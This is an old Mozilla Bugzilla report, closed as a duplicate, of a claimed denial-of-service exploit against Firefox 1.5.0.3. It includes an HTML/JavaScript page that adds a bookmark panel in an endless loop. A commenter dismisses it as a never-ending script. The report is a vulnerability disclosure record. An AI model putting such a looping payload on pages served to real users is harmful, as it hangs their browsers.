Closed
Bug 338498
Opened 18 years ago
Closed 18 years ago
Mozilla Firefox <= 1.5.0.3 (Add Page Bookmark) Denial of Service Exploit
Categories
(Firefox :: Bookmarks & History, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 301424
People
(Reporter: alex44835, Unassigned)
References
Details
Attachments
(1 file)
(deleted),
text/html
|
Details |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
Hello :) Look this DoS Attack Exploit ... Its dangerous !
<html>
<title>Bug</Title>
<body>
<script language="JavaScript1.2" type="text/javascript">
function MainPageBookmark() {title="Gianni Amato"; url="http://www.gianniamato.it/";
if (window.sidebar) { window.sidebar.addPanel(title, url,"");} else if( window.external )
{ window.external.AddFavorite( url, title); } else if(window.opera && window.print) { return true; }}
for (k=0;k<k+1;k++) MainPageBookmark();
</script>
</body>
Reproducible: Couldn't Reproduce
Comment 1•18 years ago
|
||
Comment 2•18 years ago
|
||
This is not dangerous. This is never ending script only. I think that people can write script like this for many browsers.
Comment 3•18 years ago
|
||
*** Bug 340161 has been marked as a duplicate of this bug. ***
Comment 4•18 years ago
|
||
*** This bug has been marked as a duplicate of 301424 ***
Status: UNCONFIRMED → RESOLVED
Closed: 18 years ago
Resolution: --- → DUPLICATE
You need to log in
before you can comment on or make changes to this bug.
Description
•